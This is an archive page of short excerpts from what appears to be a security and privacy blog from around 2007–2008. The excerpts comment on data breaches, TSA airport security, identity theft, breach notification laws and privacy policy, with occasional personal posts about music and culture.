I see you stand like greyhounds in the slips…

…straining upon the start. The game’s afoot! Follow your spirit; and upon this charge Cry ‘God for Harry, England, and Saint George!’ So closes the speech before battle which Shakespeare wrote for Henry V. You know, the one which opens, ““Once more into the breach:” (Thoughts on the cumulative effects of notification letters).” I seem […]


Black Hat Speaker Selection

Black Hat USA News: We’re very proud to announce a new feature for paid Black Hat attendees starting with the USA show in August – delegate access to our CFP system! Paid delegates can now log into our CFP database, read and review our proposed presentations and share their ratings and comments with Black Hat. […]


Dan Solove's books free and online

Dan Solove has put his two current books, “The Future of Reputation” and “The Digital Person” online for free. I’ve felt bad in not reviewing The Future of Reputation, because I really enjoyed it, and have been trying to figure out what to say. Solove does a great job of surveying reputation in its many […]


Saving the Taxpayers Money

The Washington Times reports, “Outsourced passports netting govt. profits, risking national security.” It is the first of a three-parter. Interesting comments: The United States has outsourced the manufacturing of its electronic passports to overseas companies — including one in Thailand that was victimized by Chinese espionage — raising concerns that cost savings are being put […]


Science in Action

The New Scientist reports in, “Have peacock tails lost their sexual allure?” A controversial study has found no evidence for the traditional view – practically enshrined in evolutionary lore – that peahens choose their partners depending on the quality of the peacocks’ tails. Obviously, traditionalists have many things to say about the quality of the […]


On the Frequency of Fake bin Laden Messages

I’ve noticed that every time there’s a new message from Osama bin Laden, the press very carefully calls into question its authenticity. For example, CNN’s article “Purported bin Laden message: Iraq is ‘perfect base’” opens: Al-Jazeera broadcast on Thursday an audiotape on which a voice identified as Osama bin Laden declares “Iraq is the perfect […]


Algorithms for the War on the Unexpected

Technology Review has an article, “The Technology That Toppled Eliot Spitzer.” What jumped out at me was the explicit statement that strange is bad, scary and in need of investigation. Bruce Schneier is talking a lot about the war on the unexpected, and this fits right into that. Each category is analyzed to determine patterns […]


Context, please!

Chess masters will sometimes play chess against a dozen or more competitors at once, walking from board to board and making a move. The way they do this isn’t to remember the games, but to look at the board, and make a decent (to a master) move each time. They look at the board, get […]


Hannaford: 4.2 million card #s potentially exposed

Hannaford says the security breach affects all of its 165 stores in the Northeast, 106 Sweetbay stores in Florida and a smaller number of independent groceries that sell Hannaford products. The company puts the number of unique credit and debit card numbers that were potentially exposed to fraud at 4.2 million. The company is currently […]


Bear Stearns

Dan Geer is fond of saying that financial risk management works because everyone knows who owns what risks. Reports are that JPMorgan just bought Bear Stearns for $236MM, a 93% discount to Friday’s closing price, with $30BB of US taxpayer money thrown in (as guarantees) for good measure. Bloomberg also reports that the Bear Stearns […]


Liechtenstein Über Alles?

The New York Times had a story, “Tax Inquiry? Principality Is Offended:” After weathering days of criticism from Germany over a spectacular tax evasion case, Liechtenstein — sometimes seen as the inspiration for the satirical novel from the 1950s about a tiny Alpine principality that declared war on the United States — is digging in […]


Speaking of Privacy….

I was dismayed to learn that footage of Spitzer’s (alleged) rent-a-babe “Kristin” performing in a class play while in elementary school has been featured at various web sites — among them serious sites that should know better. One could argue that this woman made her bed, and now she can lie in it (puns intended). […]


Banks, Privacy and Revenge

Eliot Spitzer made a name for himself attacking banks. Setting aside the legitimacy of those attacks, I find it shocking that he didn’t realize how much banks know about each one of us. It’s doubly shocking that he didn’t expect revenge. The New York Times claimed that the “Revelations Began in [a] Routine Tax Inquiry.” […]


More Hardware Security Shown to be Bunk

After showing that “encrypted” disk drives only encrypted the password you use, not the data, Heise-Online now shows that fingerprint-access is often bunk: Manufacturers of USB sticks and cards with fingerprint readers promise us that their data safes can only be opened with the right fingerprint. It turns out that an easy-to-find tool allows nosy […]


Thank you, Usenix!

I’m delighted to report that USENIX, probably the most important technical society at which I publish (and on whose board I serve), has taken a long-overdue lead toward openly disseminating scientific research. Effective immediately, all USENIX proceedings and papers will be freely available on the USENIX web site as soon as they are published. (Previously, […]


Dan Geer: Economics and Strategies of Data Security

Speaking of books: This book explores the dramatic shift from infrastructure protection to information protection, explaining why data security is critical to business today. It describes how implementing successful data security solutions across sophisticated global organizations requires a new data-centric, risk based and strategic approach, and defines the concepts and economics of a sound data […]


Belva's got a brand new blog

Ken Belva has a new blog at http://www.bloginfosec.com/. Looks like it is more “formal” and magazine-like than the typical blog, which many people will appreciate. There seems to be a pretty solid collection of contributors, and the hunt is on for additional qualified writers. There’s even a raffle for an iPod (but I already have […]


WOOT08 Call for Papers

Progress in the field of computer security is driven by a symbiotic relationship between our understandings of attack and of defense. The USENIX Workshop on Offensive Technologies aims to bring together researchers and practitioners in system security to present research advancing the understanding of attacks on operating systems, networks, and applications. 2nd USENIX Workshop on […]


You Can't Say That: Blogging Your Failures

I forgot exactly where I saw the link to Ben Neumann’s Views from the Trenches, but the opening lines of his post “Network Outage” are great, doubly for what he’s just gone through: Today was a NIGHTMARE-DAY! Globat.com just emerged from a major outage – the worst in company history and everybody – customers and […]


Friday Pogues Blogging

I saw the Pogues’ show at Chicago’s Riviera Theatre last night, exactly 22 years minus one day since the last time I saw them. Spider Stacy seems to have fared a tad better than Shane :^). The show was good, but of course nothing can compare to nostalgia. A particularly enjoyable feature for me was […]


Analyzing the Analysts

In Things Are Looking Up For TJX, or, Javelin Research – Credibility Issues?, Alex takes a look at research released by Javelin, and compares it to some SEC filings. Javelin is making the argument that companies that suffer massive breaches will lose market share. As do these folks at Response Source: “LATEST NATIONAL RESEARCH REVEALS […]


I've Made Up My Mind, Don't Bother Me With the Facts

The report, Educational Security Incidents (ESI) Year in Review, spotlights institutions worldwide, and Penn State was included in the report with one data breach last year. … “My goal with ESI is to, hopefully, increase awareness within higher education that not only is information security a concern, but that the threats to college and university […]


The real problem in ID theft

In “Reckoning day for ChoicePoint,” Rich Stiennon writes: The real culprit is actually ChoicePoint itself and the three bureaus. By creating what is supposedly a superior solution than the old fashioned way of granting credit (knowing your customer, personal references, bank references, like they do it in most of the rest of the world) they […]


US Banks Rated for Identity Theft

Chris Hoofnagle has completed a paper which ranks US financial institutions according to their relative incidence of ID theft, based on reports to the FTC by consumers who named an institution. Chris (like another Chris I know) would like to see more complete information on ID theft available to consumers, so they can make informed […]


Threat Modeling Blog Series

Over on my work blog, I just wrapped up a series on threat modeling. Because blogs display the content backwards, I’ve put the entire series up as a Word doc: The Trouble With Threat Modeling. [Update: If you want to see all the threat modeling posts, they’re at Threat Modeling SDL blog posts. They’re displayed […]


More airport security toys

“Let’s play ‘airport security’,” says Foreign Policy. It’s like playing Doctor, only with latex gloves and inappropriate touching. In an effort to help children understand and be comfortable and confident in the need and process of higher security protocols we’ve developed a new play and learning toy and resource web site to promote and educate […]


Dubai banks hiring hackers (no word on if a drug test is needed)

Dubai, as Adam pointed out, is in something of a branding quandary. A hard line – some would say a retrograde and counterproductive line – on victimless crime doesn’t mix well with an image as a fun spot for the well-heeled. Meanwhile, there’s this (from Emirates Business 24-7, retrieved 2/21/2008): Dubai-based banks are recruiting former […]


Time To Rethink The Efficacy Of That Hard Drive Crypto

As we love to say, if you have physical access to a machine, then you have access to all the data on it. Today Ed Felten et al. proved that yet again when they released a paper describing cold boot attacks on encryption keys. In it, they show that DRAM can be stripped (even after a full […]


Back in the ring to take another swing

Via Kable’s Government Computing, comes news that the British House of Lords “Science and Technology Committee has announced a follow-up inquiry to its ‘Personal Internet Security’ report”. Chair of the committee Lord Sutherland said: “The committee was disappointed with the government’s response to its report. We felt they had failed to address some of our […]


Here we go…

Experian sues Lifelock. I think I can hear the champagne corks popping at ID Analytics from here. They, arguably, provide a service which is similar enough (a detective control against new account fraud, rather than a preventative control), but theirs operates through a different mechanism. I’d like to see some numbers showing the efficacy of […]


A++++ Fast and Professional!! Would Read Again!

In “Crowd control at eBay,” Nick Carr writes: EBay has been struggling for some time with growing discontent among its members, and it has rolled out a series of new controls and regulations to try to stem the erosion of trust in its market. At the end of last month, it announced sweeping changes to […]


Where's the Beef?

As I was driving home, listening to the radio, I heard this: We’ve been really astonished by how some of the most high-profile situations actually resulted in increased consumer confidence, because sometimes high-profile issues give us an opportunity to talk about what we do, and that has actually encouraged consumers. No, it’s not a TJX […]


Chill, dude.

Because Baltimore police officer Salvatore Rivieri seemingly was unable to tell he was being filmed. Pity. There’s some infosec relevance to obsessing and overreacting to one thing, while being oblivious to another that could prove far more damaging.


Obama vs. McDonalds

As he was winning contests in Iowa and South Carolina, Senator Barack Obama raised $32 million in January for his presidential bid, tapping 170,000 new contributors to rake in nearly double the highest previous one-month total for any candidate in this election cycle. The New York Times, “Enlisting New Donors, Obama Reaped $32 Million in […]


Because RealID Isn't Good Enough

Apparently we need not one, but two national ID cards. Illinois Reps. Mark Kirk and Peter Roskam (may they not get re-elected in November) are introducing legislation that would mandate that Social Security cards have “a photograph and fingerprint, as well as a computer chip, bar code and magnetic strip.” The cards would be modeled […]


Two brief followups to "Already donated the limit"

First, I’d like to thank everyone for keeping the comments civil and constructive. Second, I’d like to respond to Philll’s comment, “You sure do pick the strangest issues to make non-negotiable.” I picked this because it struck me that the rules in question were being accepted and treated in the various discussions as fixed and […]


Economist Debates Security V Privacy

The Economist emails: Our second series of three debates kicks off today and the first proposition raises important questions about civil rights and the trade-off between Privacy vs. Security. As a blogger and member of the community that The Economist aims to serve with this lively debate, we wanted to extend an invitation to you […]


People Not Being Terrorized

Recently, a group of passengers on the London Underground performed the dance from Michael Jackson’s “Thriller” in front of an unsuspecting audience. Shockingly, no one panicked. You can see one passenger move out of the way, but people otherwise just sat there and watched. When the performance was done, the fellow-passengers applauded. Security was not […]


Computer Capers and Progress

We’re coming up on the 30th anniversary of the publication of “Computer Capers: Tales of electronic thievery, embezzlement, and fraud,” by Thomas Whiteside. What, might you ask, can we learn from a 30 year old text? Nothing has changed. Except, for some of the names. Donn Parker is in there, as are a melange of […]


How To Fly With An Expired License

Yahoo news recently reported the story of Charleston, West Virginia Mayor Danny Jones who used a photo of himself in a magazine to prove his identity. In brief, he was flying out of John Wayne Airport and his driver’s license was expired so he wasn’t going to be allowed to get past security. The Charleston […]


"We have to be careful we don't release the wrong person"

Hence, we imprison and deport American citizens for immigration violations. Thomas Warziniack was born in Minnesota and grew up in Georgia, but immigration authorities pronounced him an illegal immigrant from Russia. Immigration and Customs Enforcement has held Warziniack for weeks in an Arizona detention facility with the aim of deporting him to a country he’s […]


How dumb do we think spammers are?

Why is it we easily admit that spammers are people smart enough to run massive bot nets, design custom malware, create rootkits, and adapt to changing protection technologies but we still think that they’re unable to write a pattern to match “user at domain dot com”? Kudos to the first person who puts such a […]


The UK Driver's License Applicants Breach and Laws

Dark Reading reported that “Data on 3M UK Drivers ‘Lost in Iowa’.” “In May this year, Pearson Driving Assessments Ltd, a private contractor to the Driving Standards Agency, informed the agency that a hard disk drive had gone missing from its secure facility in Iowa City, Iowa,” Kelly said. “The hard disk drive contained the […]


Welcome, Crispin!

Michael Howard has broken the news: “Crispin Cowan joins Windows Security: I am delighted to announce that Crispin Cowan has joined the core Windows Security Team! For those of you who don’t know Crispin, Crispin is responsible for a number of very well respected Linux-based security technologies such as StackGuard, the Immunix Linux distro, SubDomain […]


Reporting on breaches

It started with Mark Jewell of the AP, “Groups: Record data breaches in 2007.” Dissent responded to that in “Looking at 2007’s data breaches in perspective:” The following table depicts the number of U.S. incidents reported and the corresponding number of records reported exposed by the three main sites that track such data: Attrition.org, the […]


One man's vulgarity is another's lyric

DOYLESTOWN, Pennsylvania (AP) — A man who wrote a vulgar message on the memo line of a check he used to pay a $5 parking ticket has apologized in writing, leading police to drop a disorderly conduct charge against him. David Binner sent the check after receiving a $5 parking ticket. He calls it “a […]


TSA's insecure "Traveller Identity Verification" site slammed by Oversight Committee

First exposed nearly a year ago, by DIY boarding pass mastermind Chris Soghoian, a TSA web site intended to help travelers improperly recorded on watch lists has been slammed by a House Oversight and Government Reform Committee report: TSA awarded the website contract without competition. TSA gave a small, Virginia-based contractor called Desyne Web Services […]


Risk Assessment is Hard

The BBC reports (TV personality) “Clarkson stung after bank prank” in which he published his bank account numbers in the newspaper: The Top Gear host revealed his account numbers after rubbishing the furore over the loss of 25 million people’s personal details on two computer discs. He wanted to prove the story was a fuss […]


The Laboratories of Democracy in Action

Chris emailed me a bit before Christmas with a link to the new “New York State Security Breach Reporting Form.” How could we withhold this exciting news? I wanted to wait until people were back from vacation, so they didn’t miss it. The form is important because it’s starting to ask for more data. There’s […]


Andy Olmsted

Andy Olmsted, who posted as G’Kar on Obsidian Wings, was killed yesterday in Iraq. I always enjoyed his posts, especially when I disagreed with them, because he was so clearly thoughtful. I find myself terribly sad for the death of a man who I only knew through his words. He asked that we not politicize […]


Ohio Voters May Demand Paper Ballots

Ohio Secretary of State Jennifer Brunner announced yesterday that paper ballots must be provided on request. Poll workers won’t be told to offer the option to voters but must provide a ballot if requested to help “avoid any loss of confidence by voters that their ballot has been accurately cast or recorded,” a directive from […]


Citibank limiting ATM withdrawals in NYC?

Title: Citibank limits ATM cash in city
Author: KERRY BURKE and LARRY McSHANE
Source: DAILY NEWS
Date Published: January 3rd 2008
Excerpt: The New York-based Daily News reported today that Citibank has limited the cash amount its customers can take out of ATM machines. It is being reported that the security of Citibank’s ATM machines in […]


"Security Vulnerability Research & Defense"

My co-workers in SWI have a new blog up, “Security Vulnerability Research & Defense.” They’re planning to…well, I’ll let them speak for themselves: …share more in-depth technical information about vulnerabilities serviced by MSRC security updates and ways you can protect your organization from security vulnerabilities… The two posts below are examples of the type of […]


Emergent Privacy Reporting

On December 19th, Denebola, the student run newspaper of Newton South High School, broke the news that video cameras had been secretly installed in their school. Not only were students and parents not notified of the cameras but apparently neither were any of the teachers. From the student article: According to Salzer, only he, Superintendent […]


Aaron Burr and Compulsory Key Disclosure

Orin Kerr has a fascinating tidbit at Volokh, “Encryption, the Fifth Amendment, and Aaron Burr:” Following my posts last week on encryption and the Fifth Amendment, a few readers asked about how courts have dealt with such issues before. As far as I know, there is only one other judicial decision specifically addressing the Fifth […]


Merry Christmas, Dr. Hansen!

A surgeon who allegedly took a photo of a patient’s penis during an operation at a US hospital is no longer working there, it has been announced. Dr Adam Hansen, of Arizona’s Mayo Clinic Hospital, is accused of taking the snap while conducting gallbladder surgery earlier in December. (BBC, “US ‘penis photo doctor’ loses job.”) […]


Bonobos!

Check out this amazing video from TED.


Six breach reports in the UK: the floodgates are open

In Dissent’s weekly roundup of breaches, there were six breaches reported for the UK, versus nine in the US. It seems that the duty of care approach is really taking off. Newly reported incidents in the U.K. and Ireland: In Ireland, the Driver and Vehicle Licensing Agency has lost the personal details of 6,000 people. […]


The Words of our (Founding) Fathers

There’s an article in the Washington Post, “In the Course of Human Events, Still Unpublished.” It’s about how the papers of the founding fathers of the United States are still not available except in physical form, and the scholarly practice that keeps them there. Many of the founding fathers’ letters have been transcribed and made […]


Deloitte & Touche, Ponemon Study on Breaches

According to Dark Reading, “Study: Breaches of Personal Data Now Prevalent in Enterprises:” According to a study released yesterday by the Ponemon Institute and Deloitte & Touche, 85 percent of the security or privacy executives surveyed — some 800 individuals — claimed at least one reportable security incident in the past 12 months. Sixty-three percent […]


Clark Kent Ervin on TSA Security

Normally, it’s not news when someone takes aim at TSA policies like this: If you are someone who suspects that what is billed as “aviation security” is often more show than substance, you are not alone. In fact, you are part of what Nixon aides used to call the “silent majority.” The security bureaucracy seems […]


So when's the Chicago gig, gents?

‘Good Times Bad Times’ ‘Ramble On’ ‘Black Dog’ ‘In My Time Of Dying’ (full version) ‘For Your Life’ ‘Trampled Under Foot’ ‘Nobody’s Fault But Mine’ ‘No Quarter’ ‘Since I’ve Been Loving You’ ‘Dazed And Confused’ ‘Stairway To Heaven’ ‘The Song Remains The Same’ ‘Misty Mountain Hop’ ‘Kashmir’ ‘Whole Lotta Love’ ‘Rock And Roll’ Playlist via: […]


Data Thefts Triple This Year?

So says USA Today, in “Theft of personal data more than triples this year.” A few small quibbles: I’d prefer if Byron Acohido had said “reported” thefts. It’s not clear if thefts or reports tripled. I suspect the reports, but proving that would be tough. Both of those things said, it’s a good article, and […]


The Emergent Chaos of the US Presidential Campaign

This New York Times article really is interesting. It’s all about how candidates are losing control of their campaigns, and they’re in a new relationship with emergent phenomena on the internet. Now, as we come to the end of a tumultuous political year, it seems clear that the candidates and their advisers absorbed the wrong lessons […]


Stupid Safety Feature Of The Week

I love my Prius. It’s fun to drive, eco-friendly and even has lots of geek appeal. However it has one incredibly moronic safety feature which I was reminded of while driving through the snow the other day. Now I have the base model which means I don’t have fancy features like the automatic skid prevention. […]


CA1386 meet AB1298

Life is about to get a lot more complicated for companies that do business in California. I completely missed this getting signed back in October, but on 10/14, the Governator signed AB1298 which updates CA1386 to mandate that medical and health insurance policy information also are to be treated as PII. To say that this […]


Gartner the omniscient

This in reference to the recent HMRC breach… However, [Gartner VP Avivah] Litan warned that the chance of identity theft was actually small, at just 1%. Digitaltrends.com The probability of this estimate being scientifically defensible is 0.00%. I’ll have something to say about learning (for real) from the HMRC breach in a soon-to-come post.


Open Letter to Chris Dodd

Dear Chris: I think you’re a smart person who cares about honesty and the rule of law. I also think your e-mail fundraising campaign is undermining that message by sending what I believe to be deliberately deceptive emails. To be clear, I am not referring to deception in the political message — spinning words, being […]


Biometrics are not a panacea for data loss

Ian Brown writes, “Biometrics are not a panacea for data loss:” “What we must ensure is that identity fraud is avoided, and the way to avoid identity fraud is to say that for passport information we will have the biometric support that is necessary, so that people can feel confident that their identity is protected.” […]


HMRC Data discs on EBay

Quite possibly the funniest infosec joke seen in 2007. Here we have two CD-R’s for auction. They are not blank, but seem to have some sort of database written to them. I found them in my local courier firm’s sorting office, addressed to “Her Majesties Audit Office – Child Benefits Section” and marked “Sensitive HM […]


Vulnerability Disclosure Agents Part N

Recently Dave G of Matasano (and smoked salt) fame wrote two interesting articles on Vulnerability Disclosure Markets. In the second one, he reposted a user’s comment: Based on the failing (due to agenda) of (particular) Researchers, Coordinators (i.e. FIRST Members) and Vendors – Which “trusted person or organization” is left “that can represent vulnerability researchers whose […]


The costs of liability

It’s become common for people thinking about security economics to call for liability around security failures. The idea is that software creators who ship insecure products could be held liable, because they’re well positioned to address the problems. I don’t think this is a trouble-free idea. There are lots of complexities. As one example, […]


Why can't the CIA hire guys like this?

The Telegraph is concerned that The most senior British intelligence official, appointed yesterday to oversee MI5, MI6 and GCHQ, has a website revealing his home address, phone numbers and private photographs of himself, family and friends. www.telegraph.co.uk The upshot seems to be that the gent in question, Alex Allan, lacks the circumspection one would demand […]


Controlling Water

In Controlling Water, Dana writes: …Alex Stupak, […] dropped this bombshell in my ear with the casual effect of a little bird chirping their daily song. With no prompt, he said simply, “You know, it’s really just about controlling water,” and walked away. This simple phrase had the power of a plot changing hollywood one […]


Wednesday Privacy Roundup

Privacy in the EU has been hugely in the news in the last week. Check these out: European Union justice ministers Friday agreed on a minimum set of rules protecting the cross-border exchange of personal data by law-enforcement agencies in the 27 member states. There were lots of other proposals discussed, including ones that mimic […]


Splunk'd?

I have been playing with Splunk, for about 45 minutes. So far, I like it. I’ve previously been exposed to Arcsight, but what I have more of an affinity for psychologically is not so much a correlation engine, but a great visualization tool that automagically can grok log formats without making me write a hairy […]


How Government Can Improve Cyber-Security

In “How Can Government Improve Cyber-Security?” Ed Felten says: Wednesday was the kickoff meeting of the Commission on Cyber Security for the 44th Presidency, of which I am a member. The commission has thirty-four members and has four co-chairs: Congressmen Jim Langevin and Michael McCaul, Admiral Bobby Inman, and Scott Charney. It was organized by the […]


Measuring the Wrong Stuff

There’s a great deal of discussion out there about security metrics. There’s a belief that better measurement will improve things. And while I don’t disagree, there are substantial risks from measuring the wrong things: Because the grades are based largely on improvement, not simply meeting state standards, some high-performing schools received low grades. The Clove […]


The Magic Phone

The “gPhone” was announced today. I put gPhone in quotes, because there was no actual phone announcement. What was announced was the “Open Handset Alliance” and their toolkit, Android. They are “…committed to commercially deploy handsets and services using the Android Platform in the second half of 2008.” and “An early look at the Android […]


Gordon Brown on liberty

While this great tradition can be traced back to the Magna Carta, it was the rise of the modern state with all the new powers at its disposal that made the 17th century the pivotal period in the struggle against arbitrary and unaccountable government — as Britain led the way in the battle for freedom […]


Informed discussion? Cool!

David Litchfield examines some public breach data and concludes that Word documents and spreadsheets mistakenly left on a web server or indexed by a search engine account for 20.6% of the 276 breaches, both physical and digital, recorded up to the 23rd of October. He further surmises that the proportion may be even higher, since […]


WEIS 2008 Call for papers

The call for papers for the 2008 Workshop on Economics and Information Security, to be held at Dartmouth’s Tuck School of Business in late June, has just been issued. […] The 2008 Workshop on the Economics of Information Security invites original research papers focused on the economics of information security and the economics of privacy. […]


Today's Free Advice from David Litchfield

Just because you can’t see it, doesn’t mean it’s not there. Also it doesn’t mean you can’t figure out what it is… Much like traffic analysis, what you show and how you show it can reveal a lot about what is going on behind the scenes.


Beat To The Punch

Yesterday, Sammy Migues talked about the risk of too much risk management. The only problem is that he completely misused the term Risk Management. I was all set to post a rant about that here, and in fact spent far too much time last night writing up a response. In the meantime, the Hoff and […]


15-30 dataloss incidents daily, sez top Fed cyber-beancounter

The Office of Management and Budget issued a memo in July 2006 requiring agencies to report security incidents that expose personally identifiable information to the U.S. Computer Emergency Readiness Team within one hour of the incident. By June 2007, 40 agencies reported almost 4,000 incidents, an average of about 14 per day. As of this […]


Emergent Breach Analysis

When I started blogging about breaches and breach notices way back in early 2005, a number of friends wrote to say I was sounding like a broken record. They were right, and at the same time, I felt there was something really big going on, and I wanted to push it and shape it. Over […]


What Would One Actually Do With A Persona?

I asked Bob Blakley and Mike Neuenschwander some questions about Limited Liability Personae. Rather than focusing on the implementation, I wanted to talk about the high level purposes, as well as concerns that most people have with the idea of a persona. Whenever I discuss personae, there are issues that frequently come up, for example: […]


Visa says TJX Impacted 94 million accounts, $68MM+ in fraud

“Although TJX suggests that the breach only affected approximately 45.7 million accounts, in fact the breach during a period of 17 months affected more than 94 million separate accounts. To date, Visa has calculated the fraud losses experienced by issuers as a result of the breach to be between $68 million and $83 million on […]


With p=.7, Breach Costs Will Fall by 2009

There’s an article over on Tekrati, “Cost of a sensitive data breach will increase 20 percent per year through 2009, says Gartner.” Near as I can tell, this is the sort of half-thought through analysis which Gartner sometimes spews, to the great detriment of their reputation. (To be fair, I can only see what other […]


Breaches: Coverup & Disclosure

There’s an interesting case of breach non-disclosure documented in the Edmonton Sun, “Privacy breach at MacEwan.” It’s interesting for a few reasons. First, the breach wasn’t disclosed: MacEwan College was cited in the auditor general’s report this week after a tipster told the AG’s office about the security breach in 2006. It mirrored access problems […]


What's an Identity Oracle (LLPersonas)

Adam: So you say “my oracle.” Who is that? Is it an entity which I control? To be cynical, how does ‘my identity oracle’ differ from Choicepoint? Bob Blakely:My oracle most assuredly does not belong to me. It’s a commercial enterprise. It differs from choicepoint in that it has contracts with its data subjects which […]


How to Better Cite Blogs

Via BoingBoing, we learn that the NIH has a guide to citing blogs. Cool! Respectworthy! And a little lacking as a citation format. Here’s their first sample: Bernstein M. Bioethics Discussion Blog [Internet]. Los Angeles: Maurice Bernstein. 2004 Jul – [cited 2007 May 16]. Available from: http://bioethicsdiscussion.blogspot.com/. There are at least two major problems with […]


More on LLPersonae, Identity Oracles, and RCSL

Adam: But applying for a job is exactly what you describe, “organizations with whom you don’t have a lot of history and interaction.” For an awful lot of people, they apply for jobs broadly. One cashiership is as good as another. And there are a lot of places where I’d like to protect my privacy. […]


Limits of Limited Liability Personas?

Adam: I have some cost questions, but I think more importantly, this can limit my exposure to, say, a credit card, but I can get most of this without paying Delaware a couple of hundred bucks. I get a PO box, a limited credit card, and a voice mail service. What’s the advantage that’s worth […]


Bob Blakely on the LLP

Adam: The LLP is a great analogy because that’s exactly what the Limited Liability Partnership was, and is, for-controlling liability in transactions. The growth of the limited liability corporation allows me, as an investor, to invest a set amount of money, and know the limits of my exposure to management errors. But I can’t do […]


Mike Neuenschwander on Limited Liability Personas: Intro

I was deeply intrigued when I read an article in the New York Times, “Securing Very Important Data: Your Own.” Mike Neuenschwander of the Burton Group proposed an idea of “limited liability personas.” I thought this was so cool that I emailed him, proposing we interview him for the blog. He’s agreed, and here’s part […]


Breach Laws Charts

At The Privacy Symposium that Harvard Law just held, I had a fascinating conversation with Julie Machal-Fulks of the law firm of Scott & Scott. Scott and Scott have published a one page breach laws chart, with just five variables. Julie Brill of the Vermont Attorney General’s office also mentioned that she maintains a chart. […]


EWeek on The Gap Breach

Lisa Vaas has a great article in eWeek, “Let’s Demand Names in Data Fumbles” That unnamed vendor should indeed be taken to task. The Gap is now in the process of contacting an enormous number of people in the United States and Canada whose information may have been compromised, and it’s providing credit reporting services […]


Sammer at Officer Candidate School

Those of you who don’t know Sameer Parekh can ignore this message. For those of you who do, he’s joined the Marines and is attending Officer Candidate School, and would appreciate your letters: He does not have access to email or phone. Please send him snail mail (US mail) as often as you can. He […]


Looking for a challenge? Life dull?

If you need a change in your life, consider this job posting:
Title: IT Security Architecture Manager Needed
Company: TJX Companies
Location: Framingham, MA
Skills: Very strong technical security background in both the mainframe and distributed environments.
Term: Full Time
Pay: DOE
Length: Full Time
Detail: TJX Companies is seeking an IT Security Architecture Manager […]


Blogging @ Work: Blue Hat and Threat Modeling

BlueHat 6 was a great event. I had a really good time listening and talking with the attendees and speakers. The team is also looking to share a lot more about what’s happening, and one way they’ve done that is to open up their blog to speakers. There are posts from Rain Forest Puppy, Halvar […]


Connecticut Sues Accenture over Ohio Breach

As reported in the Scott and Scott Business and Technology law blog: Connecticut hired Accenture to develop network systems that would allow it to consolidate payroll, accounting, personnel and other functions. Information related to Connecticut’s employees was contained on a data tape stolen from the car of an Accenture intern working on an unrelated, though […]


What Secure Flight Really thinks about you

You can find out, by making a request under the privacy act. “Read Your Own DHS Travel Dossier.” Good commentary and context at Threat Level, “Howto: Check Your Homeland Security Travel File.”


SmartHippo Launches

Have you ever wondered how banks make so much money in the mortgage business? If you stop to think about it, mortgages are the ultimate commodity product these days. The bank collects information from you, gives you a loan, outsources the customer service to a loan servicing company, and securitizes your loan. So how do […]


Bayesian battlefield

According to court papers referenced in this VOA report, U.S. sniper teams in Iraq are using an interesting tactic: [A] so-called baiting program developed at the Pentagon by the Asymmetrical Warfare Group….the baiting was described as putting items, including plastic explosives, ammunition and detonation cords on the battlefield then killing suspected insurgents who picked up […]


How unladylike

Like most EC readers, I have been following the story of the MIT student with the breadboard and Duracell fashion accessory who nearly got ventilated at Logan airport in the most LED-hostile city in the US, Boston. The Associated Press was quick to repeat the claim that the student was wearing a “fake bomb”, when […]


Transparency in Government

The Privacy Commissioner of Canada is blogging. Welcome to the blogosphere! In unrelated news, the Canadian dollar reached parity with the US dollar for the first time in thirty years. See the Canadian Broadcasting Company, “$1 Cdn = $1 US.”


Free, as in milk

What the hell are the idiots at Facebook thinking? If there’s anything stupider than banning a woman from breastfeeding in public, it is banning a picture of a woman breastfeeding on the grounds that it is “obscene”, which is what the morons at Facebook have done, as reported (for example) by the Toronto Star. Attention […]


Motley Fool on SAIC

Case in point: SAIC confessed in July that “information … stored on a single, SAIC-owned, non-secure server at a small SAIC location, and in some cases … transmitted over the Internet in an unencrypted form … was placed at risk for potential compromise.” In the context of other firms having actual knowledge of miscreants accessing […]


Analyzing The TD Ameritrade Disclosure

In a press release, TD Ameritrade this morning confirmed reports that it has been informing customers of a potential security breach. The release does not confirm the figure of 6.3 million customers, but a company spokesperson did give that number to reporters in interviews. (Dark Reading, “TD Ameritrade Breach Affects 6.3M Customers.”) It appeared that […]


No word on the lupins

NSW Police are investigating the possible compromise of an online florist’s database and theft of customers’ credit card details. The Fraud Squad has set up Strike Force Parkview to investigate the case that involves the retailer Roses Only. There are unconfirmed reports that the details were used to make a string of luxury purchases in […]


When Hackers Don't Strike

Today the New York Times asks us: “Who Needs Hackers?” The article itself which discusses the recent outages at LAX and with Skype is fairly fluffy but has some great quotes which really cover the issues that we should be looking at as an industry. Security isn’t just about hackers, but about managing threats and […]


The Fight Against HSPD12

There’s a fascinating court fight, being run by people at the Jet Propulsion Lab. See “JPL Employees File Suit to End Background Investigations” From the press release: The plaintiffs include highly placed engineers and research scientists at JPL who have been involved in critical roles in NASA’s most successful recent programs, including leading engineers and […]


"I'm in Love with a Girl"

Another in the occasional EC weekend series highlighting awesome covers. I’d like this video even if it was silent. That stage is perfect for a Big Star tune, and the sound is right on. [If only they also performed “Thirteen“…Chilton and friends are too old (or indifferent) to play it properly now].


Pfizer's little problem

For the third straight month, the pharmaceutical giant is reporting a serious security breach that may have resulted in the loss of personal data belonging to current and/or former employees. The most recent breach, reported last week, involves the potential theft of personal data on some 34,000 current and former workers at the company. … […]


The analog hole strikes again!

I had occasion to park at a rather large parking garage attached to a rather larger complex of hospitals in downtown Chicago today. The company that runs this garage does something smart — in addition to numbering the floors of the garage and giving them a characteristic color, they also play a well-known musician’s tunes […]


From the Advances in Aviation Desk

The Beeb reports, “Goats sacrificed to fix Nepal jet,” in which we learn that two goats were slaughtered in sacrifice to the Hindu god of sky protection, Akash Bhairab, in front of a Boeing 757. Airline official Raju KC said to Reuters, “The snag in the plane has now been fixed and the aircraft has […]


Happy Labor Day

…from Chicago. (May 1st was jettisoned as a date for reasons near and dear to EC — it was too political.)


Links of the day

http://plato.stanford.edu/entries/economics/ http://faculty.fuqua.duke.edu/~rnau/choice/whoswho.htm (Also useful as a reading list for a possible upcoming cage match between Hutton and Bejtlich ;^))


Inside Carnivore

Ryan Singel has a long article in Wired: “Point, Click … Eavesdrop: How the FBI Wiretap Net Operates.” I was pretty stunned at some of the numbers: FBI endpoints on DCSNet have swelled over the years, from 20 “central monitoring plants” at the program’s inception, to 57 in 2005, according to undated pages in the […]


Senator Craig and the Behavior Detection Officers

…airport police Sgt. Dave Karsnia, who was investigating allegations of sexual conduct in airport restrooms, went into a stall shortly after noon on June 11 and closed the door. Minutes later, the officer said he saw Craig gazing into his stall through the crack between the door and the frame. After a man in the […]


Harvard Business Review on Breaches

